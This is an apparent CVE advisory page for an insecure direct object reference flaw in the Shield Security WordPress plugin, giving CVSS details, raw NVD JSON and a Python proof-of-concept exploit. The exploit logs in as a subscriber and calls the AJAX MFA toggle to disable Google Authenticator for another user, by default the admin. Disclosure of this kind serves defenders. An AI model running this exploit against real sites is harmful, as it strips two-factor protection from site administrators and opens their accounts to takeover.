Security Vulnerability Report
中文
CVE-2025-15370 CVSS 4.3 MEDIUM

CVE-2025-15370

Published: 2026-01-16 05:16:13
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Shield: Blocks Bots, Protects Users, and Prevents Security Breaches plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 21.0.9 via the MfaGoogleAuthToggle class due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disable Google Authenticator for any user.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Shield Security Plugin < 21.0.9 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-15370 PoC - IDOR in WordPress Shield Plugin # Target: WordPress site with Shield Security Plugin <= 21.0.9 # Vulnerability: Authenticated users can disable Google Authenticator for any user TARGET_URL = "http://target-wordpress-site.com" ATTACKER_USERNAME = "attacker_user" ATTACKER_PASSWORD = "attacker_password" TARGET_USER_ID = 1 # Usually admin user ID def get_nonce_and_cookie(): """Login as subscriber and get necessary tokens""" session = requests.Session() # Get login page to extract nonce login_page = session.get(f"{TARGET_URL}/wp-login.php") # Extract security nonce from login form nonce_match = re.search(r'name="_wpnonce" value="([a-z0-9]+)"', login_page.text) if not nonce_match: print("[-] Failed to extract nonce") return None, None nonce = nonce_match.group(1) # Login as low-privilege subscriber user login_data = { 'log': ATTACKER_USERNAME, 'pwd': ATTACKER_PASSWORD, 'wp-submit': 'Log In', '_wpnonce': nonce, 'redirect_to': f"{TARGET_URL}/wp-admin/" } login_response = session.post(f"{TARGET_URL}/wp-login.php", data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return None, None print("[+] Login successful as subscriber") return session.cookies.get_dict(), session def exploit_idor(cookies, session): """Exploit IDOR to disable Google Authenticator for target user""" # The vulnerable endpoint is typically: # /wp-admin/admin-ajax.php # Action: mfa_google_auth_toggle exploit_data = { 'action': 'mfa_google_auth_toggle', 'sub_action': 'disable', 'user_id': TARGET_USER_ID, # IDOR: Attacker can specify any user 'security': 'dummy_security_token' # May need valid token } response = session.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=exploit_data, cookies=cookies ) if response.status_code == 200: print(f"[+] Exploit sent - Target user_id: {TARGET_USER_ID}") print(f"[+] Response: {response.text}") return True return False def main(): print("[*] CVE-2025-15370 PoC - WordPress Shield Plugin IDOR") print("[*] Target: Disable Google Authenticator for any user") cookies, session = get_nonce_and_cookie() if not cookies: return exploit_idor(cookies, session) print("[*] Check if target user's Google Authenticator is disabled") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15370", "sourceIdentifier": "[email protected]", "published": "2026-01-16T05:16:12.717", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Shield: Blocks Bots, Protects Users, and Prevents Security Breaches plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 21.0.9 via the MfaGoogleAuthToggle class due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disable Google Authenticator for any user."}, {"lang": "es", "value": "El Shield: Bloquea Bots, Protege Usuarios y Previene Brechas de Seguridad plugin para WordPress es vulnerable a Referencia Directa Insegura a Objeto en todas las versiones hasta la 21.0.9, inclusive, a través de la clase MfaGoogleAuthToggle debido a la falta de validación en una clave controlada por el usuario. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, deshabiliten Google Authenticator para cualquier usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-simple-firewall/tags/21.0.8/src/lib/src/ActionRouter/Actions/MfaGoogleAuthToggle.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3438647/wp-simple-firewall", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d777014a-5397-4062-af39-7ea86589a0d0?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.